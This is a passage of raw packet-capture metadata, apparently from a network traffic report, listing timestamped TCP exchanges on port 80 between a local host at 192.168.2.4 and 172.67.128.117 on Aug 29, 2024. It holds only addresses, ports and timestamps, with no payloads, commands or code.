                                  Aug 29, 2024 23:42:08.551347971 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.551358938 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.551372051 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.551382065 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.551400900 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.551404953 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.551414013 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.551425934 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.551433086 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.551445961 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.551455975 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.551456928 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.551482916 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.551497936 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.551583052 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.551592112 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.551604033 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.551615000 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.551625967 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.551634073 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.551665068 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.551821947 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.551832914 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.551842928 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.551853895 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.551862955 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.551898003 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.551978111 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.551989079 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.552007914 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.552016973 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.552016973 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.552042961 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.552057028 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.552234888 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.552246094 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.552254915 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.552270889 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.552280903 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.552282095 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.552295923 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.552306890 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.552306890 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.552320957 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.552333117 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.552335024 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.552342892 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.552346945 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.552356005 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.552366018 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.552376032 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.552377939 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.552388906 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.728753090 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.728776932 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.728786945 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.728801012 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.728811979 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.728821039 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.728847027 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.728869915 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.728943110 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.728955984 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.728966951 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.728977919 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.728988886 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.728990078 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.728997946 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.729007006 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.729022026 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.729046106 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.729070902 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.729082108 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.729093075 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.729104042 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.729115009 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.729115963 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.729127884 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.729139090 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.729151011 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.729171038 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.729176998 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.729214907 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.729228973 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.729268074 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.729278088 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.729289055 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.729300022 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.729325056 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.729368925 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.729379892 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.729391098 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.729404926 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.729420900 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.729435921 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.729449987 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.729473114 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.729509115 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.729598045 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.729609966 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.729620934 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.729630947 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.729641914 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.729654074 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.729665995 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.729681015 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.729684114 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.729707956 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.729721069 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.729722023 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.729764938 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.729767084 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.729779959 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.729806900 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.729810953 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.729820013 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.729850054 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.729933023 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.729943991 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.729954958 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.729964018 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.729981899 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.729993105 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.730020046 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.730303049 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.730365038 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.730386972 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.730397940 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.730426073 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.730428934 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.730437994 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.730443001 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.730449915 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.730460882 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.730465889 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.730479956 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.730498075 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.730501890 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.730514050 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.730525017 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.730535984 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.730545998 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.730547905 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.730561018 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.730566978 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.730595112 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.730705976 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.730716944 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.730755091 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.730794907 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.730806112 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.730815887 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.730838060 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.730849981 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.730921030 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.730931997 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.730942011 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.730966091 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.730989933 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.814894915 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.814919949 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.814935923 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.814946890 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.814956903 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.814968109 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.814976931 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.814990044 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.815061092 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.815061092 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.815061092 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.815061092 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.815061092 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.815280914 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.815299034 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.815308094 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.815321922 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.815332890 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.815352917 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.815422058 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.815454960 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.815469027 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.815469980 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.815495014 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.815496922 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.815505981 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.815509081 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.815516949 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.815536976 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.815548897 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.815557957 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.815784931 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.815793037 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.815824986 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.815835953 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.815888882 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.815928936 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.815937042 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.815947056 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.815973043 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.815984964 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.816000938 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.816011906 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.816020966 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.816030025 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.816042900 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.816047907 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.816055059 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.816063881 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.816082001 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.816106081 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.816113949 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.816123962 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.816133022 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.816152096 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.816168070 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.816198111 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.816207886 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.816251993 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.816262007 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.816272974 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.816298962 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.816314936 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.816338062 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.816390991 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.816400051 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.816406012 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.816410065 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.816421032 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.816430092 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.816433907 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.816453934 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.816478014 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.816519976 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.816562891 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.816586018 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.816601038 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.816629887 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.816647053 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.816662073 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.816672087 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.816685915 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.816703081 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.816706896 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.816721916 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.816730022 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.816747904 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.817147017 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.817157984 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.817168951 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.817187071 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.817197084 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.817223072 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.817236900 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.817246914 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.817256927 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.817269087 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.817271948 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.817280054 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.817291975 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.817296028 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.817306042 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.817331076 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.817379951 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.817393064 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.817404985 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.817414999 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.817424059 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.817424059 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.817450047 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.817472935 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.817533016 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.817543983 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.817549944 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.817554951 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.817576885 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.817595959 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.817614079 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.817625999 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.817631006 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.817637920 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.817662954 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.817677975 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.817776918 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.817787886 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.817794085 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.817801952 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.817812920 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.817823887 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.817826986 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.817833900 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.817856073 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.817867041 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.817892075 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.817939997 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.817950964 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.817977905 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.817982912 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.817992926 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.818021059 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.818053007 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.818063021 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.818068981 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.818073988 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.818094015 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.818111897 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.818172932 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.818182945 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.818211079 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.818236113 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.818300009 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.818309069 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.818317890 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.818344116 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.818351030 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.818361044 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.818368912 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.818372011 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.818387985 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.818408966 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.818419933 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.818468094 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.818485022 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.818511963 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.818526983 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.996227980 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.996227980 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.996242046 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.996252060 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.996253014 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.996265888 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.996274948 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.996277094 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.996289015 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.996296883 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.996299982 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.996313095 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.996320963 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.996324062 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.996335983 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.996340036 CEST4973080192.168.2.4172.67.128.117
